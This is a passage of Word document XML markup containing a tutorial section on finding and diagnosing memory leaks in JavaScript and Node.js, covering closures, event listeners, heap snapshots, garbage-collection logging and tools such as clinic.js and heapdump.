          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Closures</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Improper use of closures can inadvertently hold references to variables, leading to memory leaks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64715239" w14:textId="77777777" w:rsidR="00172E43" w:rsidRPr="00DA2F32" w:rsidRDefault="00172E43" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="252"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Event Listeners</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Not removing event listeners can result in memory leaks if listeners are attached to objects that are never cleaned up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6C31B1" w14:textId="77777777" w:rsidR="00172E43" w:rsidRPr="00DA2F32" w:rsidRDefault="00172E43" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="252"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Detached DOM Nodes</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> (in the browser): Nodes that are removed from the DOM but still referenced in JavaScript.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BB3D19"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rPr>
        <w:t>Detecting Memory Leaks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5123D434" w14:textId="77777777" w:rsidR="00172E43" w:rsidRPr="00DA2F32" w:rsidRDefault="00172E43" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="253"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Monitor Memory Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6690ACD9" w14:textId="77777777" w:rsidR="00172E43" w:rsidRPr="00DA2F32" w:rsidRDefault="00172E43" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="253"/>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Use tools like process.memoryUsage() to monitor heap and RSS (Resident Set Size) memory usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5743F87E" w14:textId="77777777" w:rsidR="00172E43" w:rsidRPr="00DA2F32" w:rsidRDefault="00172E43" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="253"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Browser</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use browser developer tools to monitor memory usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BF91A8"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console.log(process.memoryUsage());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4543DDFB" w14:textId="77777777" w:rsidR="00172E43" w:rsidRPr="00DA2F32" w:rsidRDefault="00172E43" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="253"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Heap Snapshots</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A7BB14" w14:textId="77777777" w:rsidR="00172E43" w:rsidRPr="00DA2F32" w:rsidRDefault="00172E43" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="253"/>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Use the built-in V8 profiler or external tools like clinic.js to take heap snapshots.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C0C063" w14:textId="77777777" w:rsidR="00172E43" w:rsidRPr="00DA2F32" w:rsidRDefault="00172E43" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="253"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Browser</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use the Chrome DevTools Memory tab to take and analyze heap snapshots.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A172CC" w14:textId="77777777" w:rsidR="00172E43" w:rsidRPr="00DA2F32" w:rsidRDefault="00172E43" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="253"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Memory Profiling</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBDFE56" w14:textId="77777777" w:rsidR="00172E43" w:rsidRPr="00DA2F32" w:rsidRDefault="00172E43" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="253"/>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Tools like node --inspect or clinic can be used to profile memory usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD2F765" w14:textId="77777777" w:rsidR="00172E43" w:rsidRPr="00DA2F32" w:rsidRDefault="00172E43" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="253"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Browser</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use the Chrome DevTools to record memory profiles and analyze allocations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1469A27B" w14:textId="77777777" w:rsidR="00172E43" w:rsidRPr="00DA2F32" w:rsidRDefault="00172E43" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="253"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Garbage Collection Logs</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338AF26B" w14:textId="77777777" w:rsidR="00172E43" w:rsidRPr="00DA2F32" w:rsidRDefault="00172E43" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="253"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Node.js</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Enable garbage collection logging by running Node.js with the --trace-gc flag to see details about garbage collection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EE761F"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node --trace-gc your-script.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34362D13"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rPr>
        <w:t>Diagnosing Memory Leaks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6BF305" w14:textId="77777777" w:rsidR="00172E43" w:rsidRPr="00DA2F32" w:rsidRDefault="00172E43" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="254"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Analyze Heap Snapshots</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5156CB60" w14:textId="77777777" w:rsidR="00172E43" w:rsidRPr="00DA2F32" w:rsidRDefault="00172E43" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="254"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Compare multiple heap snapshots to identify objects that are growing over time and not being collected by garbage collection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C5036F" w14:textId="77777777" w:rsidR="00172E43" w:rsidRPr="00DA2F32" w:rsidRDefault="00172E43" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="254"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Look for detached DOM nodes, growing arrays, or large objects that are not being freed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66217FD4" w14:textId="77777777" w:rsidR="00172E43" w:rsidRPr="00DA2F32" w:rsidRDefault="00172E43" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="254"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Profile Memory Allocations</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E31E54C" w14:textId="77777777" w:rsidR="00172E43" w:rsidRPr="00DA2F32" w:rsidRDefault="00172E43" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="254"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Record and analyze memory allocation profiles to find out which parts of the code are allocating the most memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B36630F" w14:textId="77777777" w:rsidR="00172E43" w:rsidRPr="00DA2F32" w:rsidRDefault="00172E43" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="254"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Inspect Memory Usage Trends</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0083171C" w14:textId="77777777" w:rsidR="00172E43" w:rsidRPr="00DA2F32" w:rsidRDefault="00172E43" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="254"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Monitor trends in memory usage over time. If memory usage continually increases without being released, it may indicate a memory leak.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401A4CC9" w14:textId="77777777" w:rsidR="00172E43" w:rsidRPr="00DA2F32" w:rsidRDefault="00172E43" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="254"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Check for Common Leak Patterns</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C009D07" w14:textId="77777777" w:rsidR="00172E43" w:rsidRPr="00DA2F32" w:rsidRDefault="00172E43" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="254"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Review code for common patterns that cause leaks, such as global variables, event listeners that are not removed, or closures holding onto large objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E94EAF6"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rPr>
        <w:t>Tools for Memory Leak Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4206BBE7" w14:textId="77777777" w:rsidR="00172E43" w:rsidRPr="00DA2F32" w:rsidRDefault="00172E43" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="255"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Node.js Tools</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17637346" w14:textId="77777777" w:rsidR="00172E43" w:rsidRPr="00DA2F32" w:rsidRDefault="00172E43" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="255"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Node.js Inspector</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Run Node.js with --inspect and use Chrome DevTools to inspect memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D49FC8D" w14:textId="77777777" w:rsidR="00172E43" w:rsidRPr="00DA2F32" w:rsidRDefault="00172E43" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="255"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Clinic.js</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Provides tools like clinic doctor to diagnose performance issues, including memory leaks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6A88EF" w14:textId="77777777" w:rsidR="00172E43" w:rsidRPr="00DA2F32" w:rsidRDefault="00172E43" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="255"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Heapdump</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Generate heap snapshots programmatically and analyze them later.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586D13DA"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npm install heapdump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E25056" w14:textId="77777777" w:rsidR="00172E43" w:rsidRPr="00DA2F32" w:rsidRDefault="00172E43" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="017BA7F9" w14:textId="506CCC31" w:rsidR="00172E43" w:rsidRPr="00DA2F32" w:rsidRDefault="00172E43"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heapdump = require('heapdump');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE7B7D8"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heapdump.writeSnapshot('/path/to/snapshot.heapsnapshot');</w:t>
      </w:r>
    </w:p>
